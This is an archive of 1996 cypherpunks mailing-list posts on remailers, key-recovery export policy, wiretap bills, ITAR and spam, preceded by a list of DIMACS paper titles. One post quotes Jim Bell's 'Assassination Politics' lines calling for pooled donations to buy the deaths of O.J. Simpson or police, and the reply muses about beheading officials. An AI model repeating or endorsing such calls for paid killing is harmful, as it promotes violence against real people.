   Cryptographically Secure Digital Time-Stamping to Support 
   Trust Management 
 
   Stuart Haber and Scott Stornetta, Bellcore and Surety 
   Technologies (respectively) 
 
   _________________________________________________________ 
 
   Untrusted Third Parties: Key Management for the Prudent 
 
   Mark Lomas and Bruno Crispo, Cambridge University 
 
   _________________________________________________________ 
 
   Distributed Commerce Transactions: Structuring 
   Multi-Party Exchanges into Pair-wise Exchanges 
 
   Steven Ketchpel and Hector Garcia-Molina, Stanford 
   University 
 
   _________________________________________________________ 
 
   Policy-Controlled Cryptographic Key Release 
 
   Dennis K. Branstad and David A. McGrew, Trusted 
   Information Systems, Inc. 
 
   _________________________________________________________ 
 
   An X.509v3 Based Public-key Infrastructure for the 
   Federal Government 
 
   William Burr, National Institute of Standards and 
   Technology 
 
   _________________________________________________________ 
 
   The ICE-TEL Public-Key Infrastructure and Trust Model 
 
   David W. Chadwick [1], University of Salford 
 
   _________________________________________________________ 
 
   A Distributed Trust Model 
 
   Alfarez Abdul-Rahman and Stephen Hailes, University 
   College, London 
 
   _________________________________________________________ 
 
   On Multiple Statements from Trusted Sources 
 
   Raphael Yahalom, Hebrew University and MIT 
 
   _________________________________________________________ 
 
   Off-line Delegation in a Distributed File Repository 
 
   Arne Helme and Tage Stabell-Kulo, University of Twente 
   and University of Troms 
 
   _________________________________________________________ 
 
   Operational Tradeoffs of Aggregating Attributes in 
   Digital Certificates 
 
   Ian Simpson, Carnegie Mellon University 
 
   _________________________________________________________ 
 
   Trust Management for Mobile Agents 
 
   William M. Farmer, Joshua D. Guttman, and Vipin Swarup, 
   MITRE 
 
   _________________________________________________________ 
 
   Trust Management in ERLink 
 
   Samuel I. Schaen, Mitre 
 
   _________________________________________________________ 
 
   Linking trust with network reliability 
 
   Yvo Desmedt and Mike Burmester, University of Wisconsin 
   at Milwaukee and Royal Holloway College 
 
   _________________________________________________________ 
 
   Trust Management Under Law-Governed Interaction 
 
   Naftaly H. Minsky and Victoria Ungureanu, Rutgers 
   University 
 
   _________________________________________________________ 
 
   Tools for Security Policy Definition and Implementation 
 
   P. Humenn, BlackWatch Technology, Inc. 
 
   _________________________________________________________ 
 
 
   http://jya.com/dimacs.txt  (80 kb) 
 
   ftp://jya.com/pub/incoming/dimacs.txt 
 
 
   Sorry, no E-mail of this one. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 1 Oct 1996 20:37:41 +0800
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: What about making re-mailers automatically chain?
Message-ID: <3.0b28.32.19961001030608.006af114@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


Removing knowledge of the path from the sender is a plus.  This prevents
anyone, even the sender, from being able to give up any useful info even if
under court order.
<<<<

Why is information about the path useful (or harmful) once the sender is
identified? Once the sender is identified, if they're subject to
questioning, they can be asked to identify the destination of the
message(s). Introducing indeterminacy into the middle of the route won't
prevent them from answering questions about the other endpoint. 

>>>>
  Adding "random" traffic is helpful 'cause many people (including myself)
use pre-fab anon scripts and therefore use the same anon paths all the time
(I should stop that).  This opens those messages up to some analysis and
the possibility of the sender being revealed.
<<<<

Now I see why you want this. Isn't this the sort of feature which should be
added to client software, not remailers? That way, all clients can get as
much or as little security as they need.


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul.kathro@insignia.com (Paul Kathro)
Date: Tue, 1 Oct 1996 18:07:08 +0800
To: cypherpunks@toad.com
Subject: Re: The John Doe rebellion
Message-ID: <199610010805.EAA29201@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

azur@netcom.com (Steve Schear) wrote:

>Eventually, Does could arrange to exchange IDs (if their ages and
>descriptions matched) and even credit cards (again assuming equivalence) to
>really monkey wrench things.

	An interesting idea, but how are you going to exchange
fingerprints? As far as I can see, the only tangible effect that this
scheme would have is to accelerate the call for detailed biometric
data (perhaps retinal scans or even DNA profiles) as proof of
identity.

	I'm not sure that we'd want to encourage that...

- -- Paul.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMlDQ2ioZzwIn1bdtAQFK8gF/Tugc4AuM+mlkbr663brkmqrPoR86xdu6
WNo5KzQnU6Sb7ywDz83Jq67+NkYMAErx
=Y9tO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 1 Oct 1996 18:18:54 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Anonymous: Re: Phoenix News
In-Reply-To: <199610010137.VAA23410@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.94.961001040948.24566A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Sep 1996, Perry E. Metzger wrote:

> 
> Anyone else get one of these things in their mailbox?
> 
> ------- Forwarded Message
> 
> Date: Mon, 30 Sep 1996 01:04:21 +0200 (MET DST)
> Message-Id: <199609292304.BAA11993@basement.replay.com>
> Subject: Re: Phoenix News
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> To: perry@piermont.com
> From: nobody@REPLAY.COM (Anonymous)
> Organization: Replay and Company UnLimited
> XComm: Replay may or may not approve of the content of this posting
> XComm: Report misuse of this automated service to <abuse@replay.com>
> 
> Perry Metzger,
> 
> You will find in your inbox, maybe you already have, a
> posting made by me.  I am the President and CEO of IPG.
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Read: Sole proprietor.

> Included therein is my resume and various other explanatory
> materials. We are now in the position of being able to prove
> what we have only been able to contend up to now, I realize
> that probably do not believe that, but it is true
> nonetheless. I have personally dealt with thousands of OTPs
> during the last 40 years, and our product produces a
> legitimate true OTP, pure and simple.

<Up goes the cheer> :
Post the resume and various other explanatory materials!
Post the resume and various other explanatory materials!

[...]

> Appreciatively,
> 
> Donald, ''Ralph'', Wood.
> 
> "Civility in all human matters is the best indicator of
> intelligence!"
> 
>                               - Aristotle

"A plausible impossibility is always preferable to an unconvincing
possibility."

Aristotle, Poetics.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 1 Oct 1996 15:23:56 +0800
To: jimbell@pacifier.com>
Subject: [PRIVATE] OJ/police pool for AP
In-Reply-To: <199610010319.UAA19992@mail.pacifier.com>
Message-ID: <199610010457.WAA02516@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610010319.UAA19992@mail.pacifier.com>, on 09/30/96 
   at 08:18 PM, jim bell <jimbell@pacifier.com> said:


=1EAs usual, I have a solution to this problem!   (AP, for the relatively=
 
=1Eunitiated out there.)
=1E
        well, Jim, at least you are consistent...

        I will not fault your logic in terms of the mental gymnastics
    below, but it is 'method.'   it's like anarchy is the perfect non-
    government in a perfect world.  well...  the problem is the
    perfect world is it not?  then we look at the libertarian view-
    point which starts on the premise of "benevolent" anarchy --but it
    might be a "benevolent" republic or despot to reign in the non-
    reformable greedy, violent, and generally all around "offensives."

        before you get through with just what type of government can
    support the perfect anarchy, your back in the loop trying to find
    the perfect anarchists...   next, who has the power?  --power 
    corrupts, absolute power corrupts absolutely.

        could a rule of civil, not common, law which operated under
    fundamentalist islamic rules --except a little more humane in the
    physical application of the punishment work?  would we go so far
    as to suggest a set of "requirements" for any public servant in 
    office where failure leads to beheading, no appeal.  public 
    beheading like the Islamic, following afternoon prayer services?
    why not?  it does not seem to be a pleasant way to die.  

        if I were to face the ultimate sanction, I would take the 
    firing squad --but not tied to a chair with a bag over my head
    being targeted by seven slobbering men, 3 of which have blanks so
    noone knows who really did shoot the lump of coal tied to the 
    chair  --they will not shoot you like a man because the state is a 
    coward, not the man about to die.  the fact you might see your
    executions frightens them --in Utah, which used the firing squad
    a month ago, the condemned _never_ sees his executioners.
    
        crap!  what's wrong with standing against the wall or a pole?
    can not a man die with a little dignity?  are the 4 out of 7 
    executions who fire a fatal shot to heart *painted* on the coal
    bag going to be cursed by the condemned?  crap!

        regardless of logic, and temptation to clean up the environ-
    ment, the population is not capable of altruism and will immedi-
    ately slide into a continuous round of retaliatory executions as
    the usual pharisees change your money at the tables set up at
    the temple gates.

        if we had the perfect population base, and no bad apples, we
    would not be in the position of being subject to the Gadianton
    Robbers in the first place.  the problem degenerates to the fact
    the AP scheme will degenerate in a population where everyone is
    just another Gadianton Robber practicing rape, pillage, and burn
    on the countryside.

        the original objective, I presume, was to create the perfect 
    pseudo-anarchy, and the perfect, innocent as the day they were
    born population.  --never happen, given human greed, etc. keep
    in mind that the 1/3 of the hosts of heaven, who were thrown off 
    with Satan. are being being circulated through our population 
    looking for anyone willing to sell their soul for "creature 
    comforts"  rather than eternal rewards --look around you; how
    many really good people do you see?  

        I always say:  

            "people are generally good people
                    ...until there is money involved."

        peace,
            --attila

=1EIf people really believe OJ is guilty, just pool your shekels and see =
him 
=1Edead.   Or, if you believe the cops planted evidence, buy THEIR deaths=
 via 
=1Edonation. 
=1E
    [snip]

=1ESure, thinking about this can give anyone a headache.  That's because =
AP 
=1Ecan't answer the question, "Is OJ guilty," but it could dramatically c=
hange 
=1Ethe circumstances in which such questions are answered.  

--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.

--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Tue, 1 Oct 1996 21:40:35 +0800
To: cypherpunks@toad.com
Subject: Re: RESPONSE FROM CYBERPROMO
Message-ID: <199610011105.FAA23730@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Sep 96 at 23:44, Dale Thorn wrote:

> Mail AutoResponder wrote:
> > Version 9-30-96:
> > Cyber Promotions has started to implement stricter Terms of Service
> > policies WITH TEETH.  We have just recently terminated several accounts for
> > abuse of our policies.  (Updated TOS at end of message).
> 
> [buncha text deleted]
> 
> > If you would like to send a complaint about any account @cyberpromo.com or
> > @answerme.com or @omni.cyberpromo.com  that has not been terminated, please
> > send email to: wallace@cyberpromo.com
> 
> Ya' know, it's hard enough working 10 hours a day in a sweatshop, coming 
> home to three kids and a cranky wife, the washer doesn't work, etc., and 
> now I have to answer you?
> 
> Please, just leave me alone.  Don't send me anything.  No free money.  
> Nothing.

Argh.

I got this email as well.  I thought at first that it had been sent 
to the cypherpunks mailing list, but it was actually sent directly to 
me (at least that's what the headers indicate).  So now I have to go 
through the *hell* of trying to get my name off Sanford Wallace's 
mailing list.

I wonder how long it will take?

Deana

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Oct 1996 01:42:13 +0800
To: cypherpunks@toad.com
Subject: Wiretap and FTC/FCC net-regulation legislation, from HotWired
Message-ID: <Pine.GSO.3.95.961001055826.12661C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Oct 1996 05:57:17 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Congress' wiretap and FTC/FCC net-regulation bills, from HotWired

http://www.netizen.com/netizen/96/40/index1a.html

HotWired
The Netizen

"Sure, Walter Scott"

by Declan McCullagh (declan@well.com)
Washington, DC, 30 September

   When Parade, that ever-so-offline Sunday magazine, announces that
   Iranian terrorists use the Internet and unbreakable encryption to plan
   bombings, you know that anti-Net fearmongering has outgrown the
   Beltway and is gunning for Middle America.
             
   On the page facing an advertisement for a gilded 18-inch porcelain
   cherubim (US$97.96, if you must know), columnist Walter Scott wrote
   yesterday that Iranian terrorists have "stopped using the phone" in
   favor of the Internet. Then he quoted an unnamed "expert on
   international terrorism" who claims that terrorists have outsmarted
   the spooks: "Just when we thought we had outsmarted them, they caught
   on and started using codes on the Internet.... There's so much crazy
   screwball stuff on the Internet that it's practically impossible to
   track down and isolate the terrorists." Scott did not return phone
   calls.
                 
   Small wonder, with fantastic columns like Scott's, that in the waning
   days of the 104th Congress our elected representatives have failed to
   do the right thing by the Net.
          
   A conspicuous lack of congressional spine made it almost inevitable
   that Capitol Hill would cave in to the demands of the White House and
   the Justice Department over the weekend and agree to yank portions of
   the FBI's national wiretap plan that limited the snooping powers of   
   the Feds. On Saturday, this Digital Telephony slush fund cleared the
   House as part of an elephantine six-agency spending bill and the
   Senate approved it today.
   
   Earlier this month both the House and Senate declined to act on bills
   that would lift the encryption export embargo. Supporters of the   
   measures were outflanked by Nebraska senator Jim Exon's    
   intra-committee maneuvering and the anti-terrorism rhetoric of Jamie
   Gorelick, the deputy attorney general. Gorelick said last week at a  
   hearing before the House Judiciary Committee that the DOJ is        
   "concerned about the proliferation of unbreakable encryption" that 
   might fall into the hands of "terrorists, organized crime, and foreign
   intelligence agents." (She doesn't like to admit that PGP is already
   available around the world.)
             
   True, some of the more Net-friendly legislators have tried to help.
   Senator Conrad Burns (R-Montana) emerged as a champion of netizens'
   privacy rights with his encryption bill, Pro-CODE. Representative Rick
   White (R-Washington) introduced a bill that would let ISPs give free
   online time to political candidates - but even though the House passed
   the bill last Thursday, the Senate will not.
               
   In another kind of congressional schizophrenia, one measure would give
   the Federal Trade Commission authority to regulate the Internet -
   while another bill blocks the Federal Communications Commission from
   even thinking about it.

   White attached an amendment to the FCC Modernization Act - an act that
   completely denies the commission jurisdiction "with respect to content
   or other regulation of the Internet or other interactive computer
   services." The House Republicans passed it over the objections of the
   Dems on 12 September, but it's still stuck in committee.
        
   White had tried to insert this amendment in the 1996 Telecom Act, but
   it was sliced out. Now he's trying again. "He believes that the
   federal government gets a little overzealous in regulation," says
   Connie Correll, White's press secretary. "We're dealing with a new
   medium that people aren't too familiar with."
           
   An FCC policy analyst says the commission "doesn't want to regulate
   the Net" but that "White's language would be a mistake." The analyst,
   who wished to remain anonymous, said: "For example, would the FCC be
   barred from creating regulations to protect privacy online, or from
   preempting state laws and regulations that criminalize online        
   indecency?" 
   
   Then late last week, Representative Bob Franks (R-New Jersey) coughed
   up his own Net-regulation bill. It's designed to respond to the outcry
   over the Lexis-Nexis P-TRAK database by halting the spread of Social 
   Security numbers. Inexplicably, it does that by letting the FTC      
   "examine and investigate" ISPs and issue "cease and desist" orders    
   against them if they serve as an SSN-distribution conduit.          
   
   I called up Frank DiStefano from Franks' office. "Why hold ISPs
   liable?" I asked him. "In June, the FTC itself decided to hold off
   from Net regulation.. If someone is giving out another person's       
   personal information, why not let the courts decide if he's violating
   the law?"
   
   "OK, you've convinced me," said DiStefano. He said the reason the FTC
   provisions were in the bill was "to make a point" and his office    
   "would work on this over the recess." 
   
   No doubt - until Parade calls for the FTC to crack down on          
   narco-terrorists selling Social Security numbers online.

---

Some links:

   Linkname: Brock Meeks on FEC reform, Rep. White's bill
        URL: http://www.netizen.com/netizen/96/18/index5a.html

   Linkname: Democrats vote in committee to let FCC regulate Net
        URL:             
          http://www2.eff.org/pub/Legislation/Bills_by_sponsor/white_fcc_
          noregulation_1996.vote

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 2 Oct 1996 15:42:58 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <Pine.SUN.3.94.961001002354.20271A-100000@polaris>
Message-ID: <325125D4.5E4F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> Signs of unrest in the nation's capital.
> These signs began to appear all over yesterday.
> WARNING
> THIS AREA HAS BEEN
> DECLARED A DRUG FREE ZONE
> Any person congregating in a group of 2 or more persons on
> public space within the boundaries of this drug free zone for
> the purpose of participating in the use, purchase of sale of
> illegal drugs, and who fails to disperse after being
> instructed to disperse by a uniformed member of the
> Metropolitan Police Department, is subject to arrest.  An
> arrest can result in a fine of not more than $300,
> Imprisonment for not more than 180 days or both.
> Boundaries         _________________________
> Dates and Times    _________________________
> Larry D. Soulsby
> Chief of Police
> (Act 11-278, Anti-Loitering/Drug Free Zone Emergency Act of 1996)

I was in L.A. County Court in 1986, and I noticed a TV reporter in the 
bleachers.  The judge gave an injunction to some neighbors that their 
neighbors could not sell drugs, sleep on the lawn, etc., and it became 
big news then, since nobody had ever thought of that before.

So it looks like the law is evolving....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 2 Oct 1996 02:49:33 +0800
To: pgp-users@rivertown.net
Subject: Re: Clipper III on the table
Message-ID: <2.2.16.19961001091210.0d4f1440@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 AM 10/1/96 +0000, Omegaman wrote:
>Here we go again...from today's NYTimes...Clipper III
>----------------------------------------------------------------------
>-------- > Clinton Ready for Exports of Data Codes > > By DAVID E.
>SANGER > > WASHINGTON -- After several years of debate between the >
>computer industry and U.S. intelligence agencies, President > Clinton
>has decided to permit U.S. computer companies to export more >
>powerful data-scrambling software, but only if they establish a system
>> that will enable keys to the code to be obtained by law-enforcement
>> officials with a court warrant. 

...

That URL is http://www.nytimes.com/library/cyber/week/1001code.html

--
Jon Lebkowsky           http://www.well.com/~jonl              jonl@hotwired.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 03:36:01 +0800
To: cypherpunks@toad.com
Subject: Re: RESPONSE FROM CYBERPROMO
In-Reply-To: <3250BDCA.233B@gte.net>
Message-ID: <F6a5uD103w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> Ya' know, it's hard enough working 10 hours a day in a sweatshop, coming
> home to three kids and a cranky wife,

Take it to talk.abortion.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 1 Oct 1996 16:47:20 +0800
To: cypherpunks@toad.com
Subject: whitfield diffie
Message-ID: <9610010642.AA07693@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Oct 01 07:39:31 1996
what is w. diffie's email address?

don't flame me, there's been worse stuff on this list...


- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEUAwUBMlCulBFhy5sz+bTpAQEHmQf47TYvPVJnElmC5I0Vmx76VnqeVZfL9Mtn
O2XjlFS4bu0R6zAacqwOE26ul/EpPfgUvw+ogU6IDlT+NpL2N2U4AdiQvbtjmRQ/
TWaDHYZfGEOA4x6eKrrTQNMxtRWgn2fcizuaB0xlRzQffuIprJfhJLLSx7Dolf9G
IONtkf/NnEikjzaVoV4TGYhV+md9u5G76so2uCVZwv0cK+089sYBiapyV7mWlBPD
z0rHmiobAReMLuzpPKBJqrC6F4qIJk0G8R+SH0GvUhVCuvmBFlLexkduHBuvGu7b
znmWNjFCg+lXmgIYAQM3yrpGIA9aRqeiKF+psidrUDPkYcVkAHLR
=rqds
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scobbie, Jason" <jason.scobbie@anheuser-busch.com>
Date: Wed, 2 Oct 1996 01:52:18 +0800
To: "'cypherpunks'" <unicorn@schloss.li>
Subject: RE: Signs of Trouble in D.C.
Message-ID: <c=US%a=ATTMAIL%p=BUSCH%l=STLABCEXG003-961001125829Z-7340@stlabcexg001.anheuser-busch.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>Signs of unrest in the nation's capital.
>
>>>These signs began to appear all over yesterday.
>
>>>WARNING
>>>THIS AREA HAS BEEN
>>>DECLARED A DRUG FREE ZONE


I can attest to the ignorance of the govt. of DC.  Having spent 18
months in Arlington (US ARMY), I have seen many acts of total ignorance
by the govt.  One can only speculate on not only how Marion Berry has
regained his power, but to what extent some one has to go before being
banded not only a criminal but also no longer welcome in the public
sector...


Jason Scobbie
________________________

>	Drink more Bud
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Tue, 1 Oct 1996 23:42:51 +0800
To: jya@pipeline.com
Subject: Re: DIMACS Abstracts
Message-ID: <199610011203.IAA07681@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


> From:  (John Young)
 
>   http://jya.com/dimacs.txt  (80 kb) 

>   Sorry, no E-mail of this one. 

  Unless, of course, one sends "send http://jya.com/dimacs.txt"
in the body of a message to agora@dna.affrc.go.jp.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Wed, 2 Oct 1996 00:52:03 +0800
To: "barina man" <westo@bssc.edu.au>
Subject: RE: Unsubscribing Cypherpunks
Message-ID: <n1367964238.260@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


This message should be mailed to majordomo@toad.com
_______________________________________________________________________________
From: barina man on Tue, Oct 1, 1996 4:27
To: cypherpunks@toad.com

unsubcribe cypherpunks@toad.com


------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;1 Oct 1996 04:26:51 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Tue, 1 Oct 1996 8:24:04 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id WAA05035 for
cypherpunks-outgoing; Mon, 30 Sep 1996 22:00:27 -0700 (PDT)
Received: from genesis.bssc.edu.au (genesis.bssc.edu.au [203.16.225.2]) by
toad.com (8.7.5/8.7.3) with SMTP id WAA05020 for <cypherpunks@toad.com>; Mon,
30 Sep 1996 22:00:06 -0700 (PDT)
Received: from 7545HMW60219 [172.24.2.175]
	(HELO BSSC.student)
	by genesis.bssc.edu.au (AltaVista Mail F1.0/1.0 BL18 listener)
	id 0000_0054_3250_a551_127f;
	Tue, 01 Oct 1996 15:00:01 +1000
Message-Id: <1.5.4.32.19961001050008.006b2df4@172.24.1.5>
X-Sender: westo@172.24.1.5
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 01 Oct 1996 15:00:08 +1000
To: cypherpunks@toad.com
From: barina man <westo@bssc.edu.au>
Sender: owner-cypherpunks@toad.com
Precedence: bulk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 03:49:36 +0800
To: Roger Williams <roger@coelacanth.com>
Subject: Re: Export laws don't just affect crypto
In-Reply-To: <9610011330.AA1519@sturgeon.coelacanth.com>
Message-ID: <Pine.3.89.9610010807.A12171-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, Roger Williams wrote:

> >>>>> Lucky Green <shamrock@netcom.com> writes:
> 
>   > "Higher altitude and velocities up to 25,000 nautical
>   > miles-per-hour options are available in the U.S."
> 
>   > I gather from this that as long as you are in the US, you are
>   > welcome to use this technology for applications that require
>   > larger than 1,000 nmph speeds.
> 
> Umm, so are you violating ITAR if you *use* these GPS-guided missiles

No you aren't. A little known provision in the ITAR excempts exports 
by missile. Seriously.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Wed, 2 Oct 1996 02:29:25 +0800
To: pgp-users@rivertown.net
Subject: Clipper III on the table
Message-ID: <199610011345.IAA08828@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


Here we go again...from today's NYTimes...Clipper III
----------------------------------------------------------------------
-------- > Clinton Ready for Exports of Data Codes > > By DAVID E.
SANGER > > WASHINGTON -- After several years of debate between the >
computer industry and U.S. intelligence agencies, President > Clinton
has decided to permit U.S. computer companies to export more >
powerful data-scrambling software, but only if they establish a system
> that will enable keys to the code to be obtained by law-enforcement
> officials with a court warrant. 

<snip>

> Several big computer companies, led by IBM, have agreed to the new
> system, but many others, which have opposed past proposals by the
> administration for data-scrambling policies, are likely to object. 

<snip>

> But the Clinton White House, like previous administrations, citing
> national security issues and fears of foreign terrorists or
> criminals, is loath to permit the export of some of the most
> powerful data-scrambling software. 
>
> Their reason has chiefly been that intelligence agencies feared such
> equipment would be used by foreign terrorists, drug cartels and
> other criminals to hide transactions and communications. 

<snip>

> Now, in a compromise, according to two senior officials in the
> administration who have been deeply involved in the new policy, on
> Jan. 1, U.S. companies will be permitted to export software that
> encrypts, or scrambles, data using "keys" -- lengthy numeric codes
> -- that are up to 56 bits long. 

(ooooo. 16 extra bits!)

> Clinton has also decided to move the authority for exporting the
> encryption software from the state department, which has had
> export-licensing authority because the technology has been
> classified as munitions, to the commerce department, which controls
> the export of products that have both commercial and military use. 

<snip>

> But starting in two years, U.S. companies choosing to export the
> more sophisticated software would have to set up what the industry
> is calling a "key recovery" system. 

> That system would enable intelligence officials and law-enforcement
> agents, armed with court warrants, to go through a lengthy multistep
> process that would give them the mathematical key to decoding
> scrambled communications. 

> The approach replaces the administration's earlier proposed "key
> escrow" system in which the government would have been the
> repository of the numeric keys -- leading to fears of potential
> government abuse, or a reluctance by legitimate foreign users to buy
> the software. 

<snip>

> Still, the success of the system will depend in large part on the
> administration's efforts to convince other countries to adopt the
> same "key recovery" system, allowing their intelligence agencies and
> justice systems to cooperate in trailing criminals across national
> borders. 

> But Clinton's aides acknowledged Monday that this process has just
> begun, and so far only England and France have expressed much
> enthusiasm. 

<snip>

> Officials at IBM, which is expected to announce on Wednesday the
> creation of an industry consortium to aid in establishing the "key
> recovery" system, said Monday that no single entity would hold the
> entire key. 

> Instead, it will be divided across several companies that would
> handle any given message

<snip>

> There are other potential holes in the system. Customers in the
> United States will be free to buy encryption software of any
> complexity -- as they can today -- with keys that are much longer
> than 56 bits and are nearly impossible to break. 

> That means terrorist groups or drug dealers could still buy such
> software and sneak it out of the country, or even transmit it over
> computer networks. 

> "There is nothing we can do about bright students or Joe Terrorist
> who use sophisticated encryption systems to communicate with each
> other," one senior administration official said. 

> "But when they brush up against legitimate groups, especially
> banks," the official said, "then they are more likely to be dealing
> with a system" where law enforcement could use the key recovery
> system to decode the communications. 

>            Copyright 1996 The New York Times Company 

-----------------------------------------------------------------

me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Wed, 2 Oct 1996 01:56:26 +0800
To: cypherpunks@toad.com
Subject: Re: Export laws don't just affect crypto
In-Reply-To: <Pine.3.89.9609302338.A10306-0100000@netcom9>
Message-ID: <9610011330.AA1519@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Lucky Green <shamrock@netcom.com> writes:

  > "Higher altitude and velocities up to 25,000 nautical
  > miles-per-hour options are available in the U.S."

  > I gather from this that as long as you are in the US, you are
  > welcome to use this technology for applications that require
  > larger than 1,000 nmph speeds.

Umm, so are you violating ITAR if you *use* these GPS-guided missiles
outside the US? ;-)

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 2 Oct 1996 05:52:07 +0800
To: cypherpunks@toad.com
Subject: How might new GAK be enforced?
Message-ID: <v0300780dae77032b2bdd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Now that the shoe is dropping on "Clipper III" (or "Clipper IV"), the
"voluntary, for export, key escrow system," how might it be enforced?

Some possibilities:

1. Make GAK the "easiest and safest" use even within the United States. Do
this by aggressively pursuing, harassing, and prosecuting anyone who lets
non-U.S. persons, even within the United States, have access to
export-controlled software.

(I had not fully appreciated the ramifications of the ITARs for software
distributed _within_ the U.S. until the Bernstein matter unfolded.
Export-controlled software is not supposed to be sold to various classes of
foreign persons, including visitors, students on certain types of visas,
and others. Mostly such rules have been ignored, with large software stores
like CompUSA, Fry's, Egghead, etc., simply selling export-controlled
software to anyone with the money. Their are _stickers_ on some software
items warning against export, but these are ignored in sales. A few
high-profile prosecutions of large resellers could spread FUD wide and far,
triggering a "GAK-only" policy on sales of crypto products. The outcome of
the Bernstein hearing could thus be critical.)

2. Attempt to make illegal the _interoperability_ with non-GAK software.
